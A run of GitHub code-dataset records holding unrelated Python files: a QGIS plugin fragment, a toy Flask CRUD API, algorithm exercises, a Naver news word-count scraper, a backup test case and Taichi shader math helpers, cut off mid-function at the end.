self.activate_snapping(self.emit_point)\n\n\n def set_user_config(self):\n\n # Disable snapping\n self.snapper_manager.set_snapping_status()\n\n # Set snapping to 'arc', 'node', 'connec' and 'gully'\n self.snapper_manager.set_snapping_layers()\n\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_arc):\n self.snapper_manager.config_snap_to_arc()\n\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_connec):\n self.snapper_manager.config_snap_to_connec()\n\n if tools_qt.is_checked(self.dlg, self.dlg.chk_layer_node):\n self.snapper_manager.config_snap_to_node()\n\n self.snapper_manager.set_snap_mode()\n\n\n def activate_snapping(self, emit_point):\n\n # Set signals\n self.canvas.xyCoordinates.connect(self.canvas_move_event)\n emit_point.canvasClicked.connect(partial(self.canvas_release_event, emit_point))\n\n\n def canvas_move_event(self, point):\n\n # Get clicked point\n self.vertex_marker.hide()\n event_point = self.snapper_manager.get_event_point(point=point)\n if self.selection_type == SelectionType.ACTIVE:\n result = self.snapper_manager.snap_to_current_layer(event_point)\n elif self.selection_type == SelectionType.ALL:\n result = self.snapper_manager.snap_to_project_config_layers(event_point)\n\n if self.snapper_manager.result_is_valid() and result:\n self.snapper_manager.add_marker(result, self.vertex_marker)\n\n\n def canvas_release_event(self, emit_point, point, btn):\n\n if btn == Qt.RightButton:\n if btn == Qt.RightButton:\n tools_qgis.disconnect_snapping(False, emit_point, self.vertex_marker)\n return\n\n # Get coordinates\n event_point = self.snapper_manager.get_event_point(point=point)\n if self.selection_type == SelectionType.ACTIVE:\n result = self.snapper_manager.snap_to_current_layer(event_point)\n elif self.selection_type == SelectionType.ALL:\n result = self.snapper_manager.snap_to_project_config_layers(event_point)\n if result is None:\n return\n if not result.isValid():\n return\n\n layer = self.snapper_manager.get_snapped_layer(result)\n # Get the point. Leave selection\n snapped_feat = self.snapper_manager.get_snapped_feature(result)\n feature_id = self.snapper_manager.get_snapped_feature_id(result)\n snapped_point = self.snapper_manager.get_snapped_point(result)\n layer.select([feature_id])\n self.snapper_manager.restore_snap_options(self.previous_snapping)\n self.deactivate_signals()\n\n\n def deactivate_signals(self):\n\n if self.vertex_marker:\n self.vertex_marker.hide()\n\n try:\n self.canvas.xyCoordinates.disconnect()\n except TypeError:\n pass\n\n try:\n if self.emit_point:\n self.emit_point.canvasClicked.disconnect()\n except TypeError:\n pass\n\n","repo_name":"Giswater/gw_example_plugin","sub_path":"core/toolbars/my_toolbar/my_button_2.py","file_name":"my_button_2.py","file_ext":"py","file_size_in_byte":7531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"32728652772","text":"from flask import Flask\r\nfrom flask import jsonify\r\nfrom flask import request\r\napp = Flask(__name__)\r\nempDB=[\r\n {\r\n 'id':'101',\r\n 'name':'Saravanan S',\r\n 'title':'Technical Leader'\r\n },\r\n {\r\n 'id':'201',\r\n 'name':'Rajkumar P',\r\n 'title':'Sr Software Engineer'\r\n }\r\n ]\r\n@app.route('/empdb/employee',methods=['GET'])\r\ndef getAllEmp():\r\n return jsonify({'emps':empDB})\r\n@app.route('/empdb/employee/',methods=['GET'])\r\ndef getEmp(empId):\r\n usr = [ emp for emp in empDB if (emp['id'] == empId) ] \r\n return jsonify({'emp':usr})\r\n@app.route('/empdb/employee/',methods=['PUT'])\r\ndef updateEmp(empId):\r\n em = [ emp for emp in empDB if (emp['id'] == empId) ]\r\n if 'name' in request.json : \r\n em[0]['name'] = request.json['name']\r\n if 'title' in request.json:\r\n em[0]['title'] = request.json['title']\r\n return jsonify({'emp':em[0]})\r\n@app.route('/empdb/employee',methods=['POST'])\r\ndef createEmp():\r\n dat = {\r\n 'id':request.json['id'],\r\n 'name':request.json['name'],\r\n 'title':request.json['title']\r\n }\r\n empDB.append(dat)\r\n return jsonify(dat)\r\n@app.route('/empdb/employee/',methods=['DELETE'])\r\ndef deleteEmp(empId):\r\n em = [ emp for emp in empDB if (emp['id'] == empId) ]\r\n if len(em) == 0:\r\n abort(404)\r\n empDB.remove(em[0])\r\n return jsonify({'response':'Success'})\r\nif __name__ == '__main__':\r\n app.run()\r\n","repo_name":"srishilesh/Machine-learning","sub_path":"Flask API/Flask_basic.py","file_name":"Flask_basic.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"44"} +{"seq_id":"73987752132","text":"import time\nfrom yogi import tokens\n\n\ndef kmp(strg):\n p = [0 for _ in strg]\n j = -1\n for i in range(len(strg)):\n while j >= 0 and strg[j] != strg[i]:\n if j:\n j = p[j - 1]\n else:\n j = -1\n j += 1\n p[i] = j\n return p\n\n\ndef count_rotations(s, t):\n if len(s) != len(t):\n return 0\n\n n = len(s)\n s2 = s + s\n pattern = t + \"#\" + s2\n lps = kmp(pattern)\n count = 0\n for i in range(n + 1, len(lps)):\n if lps[i] == n:\n count += 1\n\n if s == t:\n return count - 1\n\n return count\n\n\ndef main():\n s, t = [], []\n s.append('abc'*10000)\n t.append('bca'*10000)\n #\n # s.append(\"zqzzqzzqz\")\n # t.append(\"zqzzqzzqz\")\n for i, x in enumerate(tokens(str)):\n if i % 2 == 0:\n s.append(x)\n else:\n t.append(x)\n\n for i in range(len(s)):\n # start = time.time()\n rots = count_rotations(s[i], t[i])\n # end = time.time()\n # print(end-start)\n print(rots)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"j-reber/jutge","sub_path":"string_rotations.py","file_name":"string_rotations.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30443963053","text":"import sys\nfrom PyQt5 import QtGui\nfrom PyQt5 import QtPrintSupport\nfrom PyQt5 import QtWidgets\n\n\nclass printChart(object):\n\n '''initiates with an image (chart) as the argument'''\n\n def __init__(self, chartimage, landscape=False, parent=None):\n self.parent = parent\n self.image = chartimage\n self.printer = QtPrintSupport.QPrinter()\n if landscape:\n self.printer.setOrientation(QtPrintSupport.QPrinter.Landscape)\n self.printer.setPaperSize(QtPrintSupport.QPrinter.A4)\n\n def sizeToFit(self):\n '''\n make the image fill the page\n '''\n rect = self.printer.pageRect()\n self.image = self.image.scaled(rect.width(), rect.height())\n\n def printpage(self, askfirst=True):\n '''\n print the chart\n '''\n dialog = QtPrintSupport.QPrintDialog(self.printer, self.parent)\n if askfirst and not dialog.exec_():\n return\n\n painter = QtGui.QPainter(self.printer)\n painter.save()\n y = 0\n x = 0\n painter.drawPixmap(x, 0, self.image)\n y += self.image.height()\n painter.restore()\n\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n chart = QtGui.QPixmap(\"images/testchart.png\")\n form = printChart(chart)\n form.printpage(True) # show a dialog for testing purposes\n sys.exit(app.exec_())\n","repo_name":"rowinggolfer/openmolar1","sub_path":"src/openmolar/qt4gui/printing/chartPrint.py","file_name":"chartPrint.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"44"} +{"seq_id":"27017841952","text":"from src.backup_manager.backup_manager import BackupManager\nfrom src.custom_test_case import CustomTestCase\nfrom src.drivers.drivers_provider import DriversProvider\nfrom src.nms_entities.basic_entities.controller import Controller\nfrom src.nms_entities.basic_entities.network import Network\nfrom src.nms_entities.basic_entities.policy import Policy\nfrom src.nms_entities.basic_entities.service import Service\nfrom src.nms_entities.basic_entities.shaper import Shaper\nfrom src.nms_entities.basic_entities.station import Station\nfrom src.nms_entities.basic_entities.teleport import Teleport\nfrom src.nms_entities.basic_entities.vno import Vno\nfrom src.options_providers.options_provider import OptionsProvider\n\noptions_path = 'test_scenarios.backup.load_backup_previous_version'\nbackup_name = 'config_4_0_0_11.txt'\n\n\nclass LoadBackupPreviousVersionCase(CustomTestCase):\n \"\"\"Loading config from previous 4.0.0.11 NMS version. Invalid vars and values should be ignored and config loaded\"\"\"\n\n __author__ = 'dkudryashov'\n __version__ = '4.0.0.21'\n __execution_time__ = None # approximate case execution time in seconds\n __express__ = True\n\n @classmethod\n def set_up_class(cls):\n cls.driver = DriversProvider.get_driver_instance(\n OptionsProvider.get_connection()\n )\n cls.backup = BackupManager()\n\n def test_applying_old_backup(self):\n \"\"\"Obsolete vars and invalid values should be ignored. Config is applied using only valid vars and values\"\"\"\n self.backup.apply_backup(backup_name)\n net1 = Network(self.driver, 0, 0)\n net1.load()\n net2 = Network(self.driver, 0, 1)\n net2.load()\n tp1 = Teleport(self.driver, 0, 0)\n tp1.load()\n tp2 = Teleport(self.driver, 0, 1)\n tp2.load()\n ctrl1 = Controller(self.driver, 0, 0)\n ctrl1.load()\n ctrl2 = Controller(self.driver, 0, 1)\n ctrl2.load()\n ctrl3 = Controller(self.driver, 0, 2)\n ctrl3.load()\n ser1 = Service(self.driver, 0, 0)\n ser1.load()\n ser2 = Service(self.driver, 0, 1)\n ser2.load()\n shp1 = Shaper(self.driver, 0, 0)\n shp1.load()\n pol1 = Policy(self.driver, 0, 0)\n pol1.load()\n vno1 = Vno(self.driver, 0, 0)\n vno1.load()\n vno2 = Vno(self.driver, 0, 1)\n vno2.load()\n stn1 = Station(self.driver, 0, 0)\n stn1.load()\n stn2 = Station(self.driver, 0, 1)\n stn2.load()\n stn3 = Station(self.driver, 0, 2)\n stn3.load()\n\n","repo_name":"underdark456/test_system","sub_path":"test_scenarios/backup/load_backup_previous_version/case_load_backup_previous_version.py","file_name":"case_load_backup_previous_version.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"28052671329","text":"\n# 네이버 뉴스 IT/과학 부분 최근 30일간 가장 많이나온 단어 상위 30개\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom collections import Counter\nimport matplotlib\nfrom matplotlib import font_manager\nfrom datetime import date, timedelta\nfrom konlpy.tag import Okt\nfrom multiprocessing import Pool, Manager\nimport time\nimport sys\nimport os\n\nfont_location = \"C:/Windows/Fonts/malgun.ttf\"\nfont_name = font_manager.FontProperties(fname=font_location).get_name()\nmatplotlib.rc('font', family=font_name)\nmatplotlib.rcParams['axes.unicode_minus'] = False\nmatplotlib.rcParams['figure.figsize'] = (12, 6)\n\ntry:\n os.chdir(sys._MEIPASS)\n print(sys._MEIPASS)\nexcept:\n os.chdir(os.getcwd())\n\nokt = Okt()\nstopwords = []\n\nwith open('.\\\\stopword.txt', 'r', encoding=\"UTF8\") as file:\n stopwords = file.readlines()\n for index, word in enumerate(stopwords):\n stopwords[index] = word.replace('\\n', '')\n print(\"stopword 읽기끝\")\n\n\ndef multireplaceEmpty(strData, replacewords):\n for word in list(replacewords):\n strData = strData.replace(word, '')\n return strData\n\n\ndef multiwordreplaceEmpty(strData):\n for word in stopwords:\n if(word == strData):\n strData = strData.replace(word, '')\n return strData\n\n\ndef StringSplit(strData):\n words = okt.nouns(strData)\n # words = strData.split(' ')\n result = []\n for word in words:\n temp = multireplaceEmpty(\n word, '\\',\\\".·/<>}{][;:?!\\r\\n\\t“‘’”…#-`()\\u2028®')\n temp = multiwordreplaceEmpty(\n temp)\n if(temp != ''):\n result.append(temp)\n\n return result\n\n\ndef paging(sid, date, number):\n url = f'https://news.naver.com/main/list.nhn?mode=LS2D&mid=shm&sid2={sid}&sid1=105&date={date}&page={number}'\n res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}).text\n soup = bs(res, \"html.parser\")\n pages = soup.select('.paging > a')\n pagelist = []\n for page in pages:\n if(page.get_text() == '다음'):\n return paging(sid, date, number+10)\n pagelist.append(page.get_text())\n\n if(pagelist == []):\n return 1\n if(pagelist[-1] == '이전'):\n return number\n return pagelist[-1]\n\n\ndays = 0\n\nif len(sys.argv) != 2:\n days = 1\nelse:\n if(sys.argv[1].isdecimal()):\n days = int(sys.argv[1])\n else:\n days = 1\n\n\nsids = [731, 226, 227, 230, 732, 283, 229, 228]\ngroup = {731: '모바일', 226: '인터넷SNS', 227: '통신뉴미디어', 230: 'IT일반',\n 732: '보안해킹', 283: '컴퓨터', 229: '게임리뷰', 228: '과학일반'}\ntoday = date.today()\n\n\ndef News_title_dict(*args):\n dic = args[0][0]\n sid = args[0][1]\n sei = []\n for i in range(days):\n DateData = (today - timedelta(days=i)).isoformat().replace('-', '')\n print(f'sid = {sid}, Date = {DateData} Point')\n\n for page in range(1, int(paging(sid, DateData, 1))+1):\n url = f'https://news.naver.com/main/list.nhn?mode=LS2D&mid=shm&sid2={sid}&sid1=105&date={DateData}&page={page}'\n res = requests.get(url, headers={'User-Agent': 'Mozilla/5.0'}).text\n soup = bs(res, \"html.parser\")\n list_title = soup.select('#main_content li a')\n print(f'{page}번 페이지 검색 Point')\n for title in list_title:\n sei.extend(StringSplit(title.get_text()))\n dic[sid] = sei\n\n\nif __name__ == '__main__':\n manager = Manager()\n dic = manager.dict()\n diclist = []\n for sid in sids:\n diclist.append((dic, sid))\n\n # print(str(diclist))\n\n startTime = time.time()\n pool = Pool(processes=4)\n pool.map(News_title_dict, iterable=diclist)\n print(\n f\"-------------------------{round(time.time() - startTime,2)}초-------------------------\")\n\n DFdatas = {}\n for key, value in dic.items():\n DFdatas[key] = pd.DataFrame(\n pd.Series(Counter(value)), columns=['count'])\n\n excel_writer = pd.ExcelWriter(\n u'네이버뉴스_IT_과학_제목_단어수.xlsx', engine='xlsxwriter')\n i = 0\n for key, value in DFdatas.items():\n DFdata = value.sort_values(['count'], ascending=False)\n DFdata.to_excel(excel_writer, index=True,\n sheet_name=f'분류 {group[key]}')\n topDFdata = DFdata.head(30)\n topDFdata.to_excel(excel_writer, index=True,\n sheet_name=f'분류 {group[key]} 상위30개 단어들')\n topDFdata.sort_values(['count']).plot(kind='barh')\n plt.title(f'{group[key]}뉴스 최근 {days}일간 가장 많이 나온 단어 상위 30개')\n i = i+1\n\n excel_writer.save()\n plt.show()\n","repo_name":"ttn218/NevernewTitlewords","sub_path":"BigDataProject.py","file_name":"BigDataProject.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"11158126503","text":"import pytest\nfrom solutions.sol_63 import Solution\n\ncases = [\n {\n \"input\": {\n \"obstacle_grid\": [[0, 0, 0], [0, 1, 0], [0, 0, 0]],\n },\n \"output\": 2,\n },\n {\n \"input\": {\n \"obstacle_grid\": [[0, 1], [0, 0]],\n },\n \"output\": 1,\n },\n]\n\n\n@pytest.mark.sol63\ndef test_run():\n for case in cases:\n assert (\n Solution.unique_paths_with_obstacles(\n obstacle_grid=case[\"input\"][\"obstacle_grid\"],\n )\n == case[\"output\"]\n )\n","repo_name":"Scalas/PS_LeetCode","sub_path":"test_solutions/test_63.py","file_name":"test_63.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22307877737","text":"def is_even(number):\n \"\"\"Check if number is even.\n\n Args:\n number (int): Any integer\n\n Returns:\n bool: if the number modulus 2 equal zero, it returns true , otherwise it returns false.\n \"\"\"\n return number % 2 == 0\n\n\ndef check_number(number):\n \"\"\"Takes a number and iterates it based on the collatz pattern.\n\n Args:\n number (int): a positive integer\n\n Returns:\n int: the result of the collatz process\n \"\"\"\n if is_even(number):\n number = number // 2\n else:\n number = 3 * number + 1\n\n return number\n\n\ndef collatz(number):\n \"\"\"Takes a number and loops until it equals 1.\n\n Args:\n number (int): a positive integer\n \"\"\"\n\n while number != 1:\n print(number)\n number = check_number(number)\n print(\"Final number is: \" + str(number))\n\n\nif __name__ == \"__main__\":\n user_input = abs(int(input(\"Enter a number:\")))\n collatz(user_input)\n","repo_name":"bnice5000/OPSC-540","sub_path":"week-2/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33291389924","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 12 13:00:22 2019\n\n@author: dennis\n\nBuild video with:\n ffmpeg -framerate 60 -pattern_type glob -i '*.png' -c:v libx264 -pix_fmt yuv420p orbits.mp4\n\"\"\"\n\nfrom physics import Body, OrbitalSystem\nimport numpy as np\nimport re\n\nplanet_names = ('io', 'ganymede', 'europa', 'callisto')\nbodies = []\nwith open('data/input.txt', 'r') as f:\n for i, line in enumerate(f.readlines()):\n x, y, z = [int(x) for x in re.findall(r'-?\\d+', line)]\n bodies.append(Body(x, y, z, planet_names[i]))\n\nsystem = OrbitalSystem(bodies, draw_flag=True, record_flag=True)\n#while not system.solved:\nwhile system.steps < 1001:\n system.step()\n\nprint('Part 1:', system.energies[1000+2])\n#print('Part 2:', np.lcm(np.lcm(system.solutions['x'], system.solutions['y']), system.solutions['z']))\n","repo_name":"dennissv/aoc-bit","sub_path":"day-12/dennis.py","file_name":"dennis.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"22179317432","text":"'''\n编写一个高效的算法来判断 m x n 矩阵中,是否存在一个目标值。该矩阵具有如下特性:\n\n每行中的整数从左到右按升序排列。\n每行的第一个整数大于前一行的最后一个整数。\n示例 1:\n\n输入:\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 3\n输出: true\n示例 2:\n\n输入:\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 13\n输出: false\n\n链接:https://leetcode-cn.com/problems/search-a-2d-matrix\n'''\nfrom typing import List\n\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix:\n return False\n row = len(matrix)\n col = len(matrix[0])\n left = 0\n right = row * col\n while left < right:\n mid = left + (right - left) // 2\n if matrix[mid // col][mid % col] < target:\n left = mid + 1\n else:\n right = mid\n # print(left,right)\n return left < row * col and matrix[left // col][left % col] == target\n\n\n# 自己的版本\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n # 二分\n if matrix is None or len(matrix) == 0 or matrix[0] is None or len(matrix[0]) == 0:\n return False\n row = len(matrix)\n col = len(matrix[0])\n left = 0\n right = row * col - 1\n while left + 1 < right:\n mid = left + (right - left) // 2\n # 一般来说 // 是区间, % 是余数: 即 //可以表示行,%表示列\n if matrix[mid // col][mid % col] < target:\n left = mid\n elif matrix[mid // col][mid % col] > target:\n right = mid\n else:\n return True\n if matrix[left // col][left % col] == target:\n return True\n elif matrix[right // col][right % col] == target:\n return True\n else:\n return False\n","repo_name":"huhudaya/leetcode-","sub_path":"LeetCode/074. 搜索二维矩阵(二维变成一维,二分).py","file_name":"074. 搜索二维矩阵(二维变成一维,二分).py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"331519417","text":"import taichi as ti\r\nimport math\r\n\r\n# %% type shortcuts\r\n\r\nvec2 = ti.types.vector(2, ti.f32)\r\nvec3 = ti.types.vector(3, ti.f32)\r\nvec4 = ti.types.vector(4, ti.f32)\r\nvec5 = ti.types.vector(5, ti.f32)\r\nvec6 = ti.types.vector(6, ti.f32)\r\nvec7 = ti.types.vector(7, ti.f32)\r\nvec8 = ti.types.vector(8, ti.f32)\r\nvec9 = ti.types.vector(9, ti.f32)\r\nvec10 = ti.types.vector(10, ti.f32)\r\nvec11 = ti.types.vector(11, ti.f32)\r\nvec12 = ti.types.vector(12, ti.f32)\r\nvec13 = ti.types.vector(13, ti.f32)\r\nvec14 = ti.types.vector(14, ti.f32)\r\nvec15 = ti.types.vector(15, ti.f32)\r\nvec16 = ti.types.vector(16, ti.f32)\r\n\r\nmat2 = ti.types.matrix(2, 2, ti.f32)\r\nmat3 = ti.types.matrix(3, 3, ti.f32)\r\nmat4 = ti.types.matrix(4, 4, ti.f32)\r\n\r\n\r\ntmpl = ti.template()\r\n# %% constants\r\n\r\ntwopi = 2 * math.pi\r\npi180 = math.pi / 180.\r\n\r\n# %% shader language functions\r\n\r\n\r\n@ti.func\r\ndef length(p):\r\n \"\"\"\r\n :param p: vector\r\n :return ti.sqrt(p.dot(p)): length of the vector p\r\n \"\"\"\r\n return ti.sqrt(p.dot(p))\r\n\r\n\r\n@ti.func\r\ndef normalize(p):\r\n \"\"\"\r\n :param p: vector\r\n :return normalised vector p\r\n \"\"\"\r\n n = p.norm()\r\n return p / (n if n != 0. else 1.)\r\n\r\n\r\n@ti.func\r\ndef mix(x, y, a):\r\n \"\"\"\r\n :param x: vector\r\n :param y: vector\r\n :param a: coefficient of mixing\r\n :return x * (1. - a) + y * a: resulting mixing vector\r\n \"\"\"\r\n return x * (1. - a) + y * a\r\n\r\n\r\n@ti.func\r\ndef dot(p, q):\r\n \"\"\"\r\n :param p: vector\r\n :param q: vector\r\n :return p.dot(q): scalar multiplication of p and q\r\n \"\"\"\r\n return p.dot(q)\r\n\r\n\r\n@ti.func\r\ndef dot2(p):\r\n \"\"\"\r\n :param p: vector\r\n :return p.dot(p): scalar multiplication of p and p\r\n \"\"\"\r\n return p.dot(p)\r\n\r\n\r\n@ti.func\r\ndef cross(x, y):\r\n \"\"\"\r\n :param x: vector\r\n :param y: vector\r\n :return: a vector perpendicular to both x and y\r\n \"\"\"\r\n return vec3(x[1] * y[2] - y[1] * x[2],\r\n x[2] * y[0] - y[2] * x[0],\r\n x[0] * y[1] - y[0] * x[1])\r\n\r\n\r\n@ti.func\r\ndef reflect(rd, n): # rd: vec3, n: vec3\r\n \"\"\"\r\n Reflects incident vector rd using surface normal n\r\n :param rd: vec3, ray\r\n :param n: vec3, normal\r\n :return: vec3, reflected ray\r\n \"\"\"\r\n # https: // www.khronos.org / registry / OpenGL - Refpages / gl4 / html / reflect.xhtml\r\n\r\n return rd - 2.0 * dot(n, rd) * n\r\n\r\n\r\n@ti.func\r\ndef deg2rad(a):\r\n \"\"\"\r\n :param a: angle in degrees\r\n :return: angle `a` in radians\r\n \"\"\"\r\n return a * pi180\r\n\r\n\r\n@ti.func\r\ndef rot(a):\r\n \"\"\"\r\n :param a: angle of the rotation in rad\r\n :return mat2([[c, -s], [s, c]]): matrix of the rotation in a 2-dim space\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat2([[c, -s], [s, c]])\r\n\r\n\r\n@ti.func\r\ndef rot_y(a):\r\n \"\"\"\r\n :param a: angle of the rotation relatively to axis y in rad\r\n :return: matrix of the rotation\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat3([[c, 0, -s],\r\n [0, 1, 0],\r\n [s, 0, c]])\r\n\r\n\r\n@ti.func\r\ndef rot_x(a):\r\n \"\"\"\r\n :param a: angle of the rotation relatively to axis x in rad\r\n :return: matrix of the rotation\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat3([[1, 0, 0],\r\n [0, c, -s],\r\n [0, s, c]])\r\n\r\n\r\n@ti.func\r\ndef rot_z(a):\r\n \"\"\"\r\n :param a: angle of the rotation relatively to axis z in rad\r\n :return: matrix of the rotation\r\n \"\"\"\r\n c = ti.cos(a)\r\n s = ti.sin(a)\r\n return mat3([[c, -s, 0],\r\n [s, c, 0],\r\n [0, 0, 1]])\r\n\r\n@ti.func\r\ndef sign(x: ti.f32):\r\n \"\"\"\r\n :param x: ti.f32: a number\r\n :return: sign of x\r\n \"\"\"\r\n return 1. if x > 0. else -1. if x < 0. else 0.\r\n\r\n\r\n@ti.func\r\ndef signv(x: tmpl):\r\n \"\"\"\r\n :param x: set of numbers\r\n :return: r: set of signs of x\r\n \"\"\"\r\n r = ti.Vector(x.shape[0], x.dtype)\r\n for i in ti.static(range(x.shape[0])):\r\n r[i] = sign(x[i])\r\n return r\r\n\r\n\r\n@ti.func\r\ndef clamp(x, low, high):\r\n \"\"\"\r\n :param x: a number\r\n :param low: a low border of diapason\r\n :param high: a high border of diapason\r\n :return: x if low < x < high or one of the borders\r\n \"\"\"\r\n return ti.max(ti.min(x, high), low)\r\n\r\n\r\n@ti.func\r\ndef fract(x):\r\n \"\"\" returns fractional part of the inserted number\r\n :param\r\n x: inserted number\r\n :returns\r\n x - ti.floor(x): fractional part of the inserted number\r\n \"\"\"\r\n return x - ti.floor(x)\r\n\r\n\r\n@ti.func\r\ndef step(edge, x):\r\n \"\"\"\r\n :param edge: a number\r\n :param x: a number\r\n :return: 0. if x < edge else 1.\r\n \"\"\"\r\n return 0. if x < edge else 1.\r\n\r\n\r\n@ti.func\r\ndef smoothstep(edge0, edge1, x):\r\n \"\"\"\r\n :param edge0: a number\r\n :param edge1: a number\r\n :param x: a number\r\n :return: 0. if x < edge else 1.\r\n \"\"\"\r\n n = (x - edge0) / (edge1 - edge0)\r\n t = clamp(n, 0.0, 1.0)\r\n return t * t * (3.0 - 2.0 * t)\r\n\r\n\r\n@ti.func\r\ndef smoothmin(a, b, k):\r\n \"\"\"\r\n Returns smoothmin\r\n :param a: float, first any number\r\n :param b: float, second any number\r\n :param k: float, coefficient\r\n :return: float, smoothmin between a and b\r\n \"\"\"\r\n h = max(k - abs(a - b), 0.) / k\r\n return min(a, b) - h * h * k * (1./4.)\r\n\r\n\r\n@ti.func\r\ndef smoothmax(a, b, k):\r\n \"\"\"\r\n Returns smoothmax\r\n :param a: float, first any number\r\n :param b: float, second any number\r\n :param k: float, coefficient\r\n :return: float, smoothmax between a and b\r\n \"\"\"\r\n return smoothmin(a, b, -k)\r\n\r\n\r\n@ti.func\r\ndef smoothmin3(a, b, k):\r\n \"\"\"\r\n Returns cubic smoothmin\r\n :param a: float, first any number\r\n :param b: float, second any number\r\n :param k: float, coefficient\r\n :return: float, cubic smoothmin between a and b\r\n \"\"\"\r\n h = max(k - abs(a - b), 0.) / k\r\n return min(a, b) - h * h * h * k * (1./6.)\r\n\r\n\r\n@ti.func\r\ndef skewsin(x, t):\r\n \"\"\"\r\n Returns skewed sin(x)\r\n :param x: ti.f32, angle in radians\r\n :param t: coefficient of skewing\r\n :return: ti.f32, skewed sin(x)\r\n \"\"\"\r\n return ti.atan2(t * ti.sin(x), (1. - t * ti.cos(x))) / t\r\n\r\n#%% PRNG\r\n\r\n@ti.func\r\ndef random2():\r\n \"\"\"\r\n Generates random vec2\r\n :return: vec2, random vector\r\n \"\"\"\r\n return vec2(ti.random(ti.f32), ti.random(ti.f32))\r\n\r\n\r\n@ti.func\r\ndef hash1(n):\r\n \"\"\"\r\n Generates pseudo-random number\r\n :param n: ti.f32, any number\r\n :return: ti.f32, number in [0,1]\r\n \"\"\"\r\n return fract(ti.sin(n) * 43758.5453)\r\n\r\n\r\n@ti.func\r\ndef hash21(p):\r\n \"\"\"\r\n Generates pseudo-random number based on vec2 p\r\n :param p: vec2, any vector\r\n :return: ti.f32, number in [0,1]\r\n \"\"\"\r\n q = fract(p * vec2(123.34, 345.56))\r\n q += dot(q, q + 34.23)\r\n return fract(q.x * q.y)\r\n\r\n@ti.func\r\ndef hash31(p):\r\n \"\"\"\r\n Generates pseudo-random number based on vec3 p\r\n :param p: vec3, any vector\r\n :return: ti.f32, number in [0,1]\r\n \"\"\"\r\n q = fract(p * vec3(123.34, 345.56, 567.78))\r\n q += dot(q, q + 34.23)\r\n return fract(q.x * q.y * q.z)\r\n\r\n\r\n@ti.func\r\ndef hash22(p):\r\n \"\"\"\r\n Generates pseudo-random vec2 based on vec2 p\r\n :param p: vec2, any vector\r\n :return: vec2, coordinates are in [0,1]\r\n \"\"\"\r\n x = hash21(p)\r\n y = hash21(p + x)\r\n return vec2(x, y)\r\n\r\n\r\n@ti.func\r\ndef hash33(p):\r\n \"\"\"\r\n Generates pseudo-random vec3 based on vec2 p\r\n :param p: vec2, any vector\r\n :return: vec3, coordinates are in [0,1]\r\n \"\"\"\r\n x = hash31(p)\r\n y = hash31(p + x)\r\n z = hash31(p + x + y)\r\n return vec3(x, y, z)\r\n\r\n\r\n# https://www.shadertoy.com/view/ll2GD3\r\n@ti.func\r\ndef pal(t, a, b, c, d):\r\n \"\"\"\r\n Returns palette-colored image\r\n :param t: ti.f32, normalized palette index\r\n :param a: ti.f32, coefficient of scale\r\n :param b: ti.f32, coefficient of biasion\r\n :param c: ti.f32, coefficient of oscillation\r\n :param d: ti.f32, coefficient of phase\r\n :return: color\r\n \"\"\"\r\n return a + b * ti.cos(twopi * (c * t + d))\r\n\r\n#%% SDF 2D\r\n\r\n\r\n@ti.func\r\ndef sd_circle(p, r): # == sd_sphere\r\n \"\"\"sdf for circle\r\n :param p: vec2, coord of the center of sphere\r\n :param r: ti.f32, radius\r\n :return p.norm() - r: sdf for sphere\r\n \"\"\"\r\n return p.norm() - r\r\n\r\n\r\n@ti.func\r\ndef sd_segment(p, a, b): # same for 3D\r\n \"\"\"\r\nSDF for segment\r\n :param p: vec3, point of the center\r\n :param a: vec3\r\n :param b: vec3\r\n :return: sdf for segment\r\n \"\"\"\r\n pa = p - a\r\n ba = b - a\r\n h = clamp(dot(pa, ba) / dot2(ba), 0.0, 1.0)\r\n return (pa - ba * h).norm()\r\n\r\n\r\n@ti.func\r\ndef sd_box(p, b): # same for 3D\r\n \"\"\"\r\n SDF for box\r\n :param p: vec3 (vec2), point of the center\r\n :param b: ti.f32, half of the length of box\r\n :return: ti.f32, sdf for box\r\n \"\"\"\r\n d = abs(p) - b\r\n return max(d, 0.).norm() + min(d.max(), 0.0)\r\n\r\n\r\n@ti.func\r\ndef sd_roundbox(p, b, 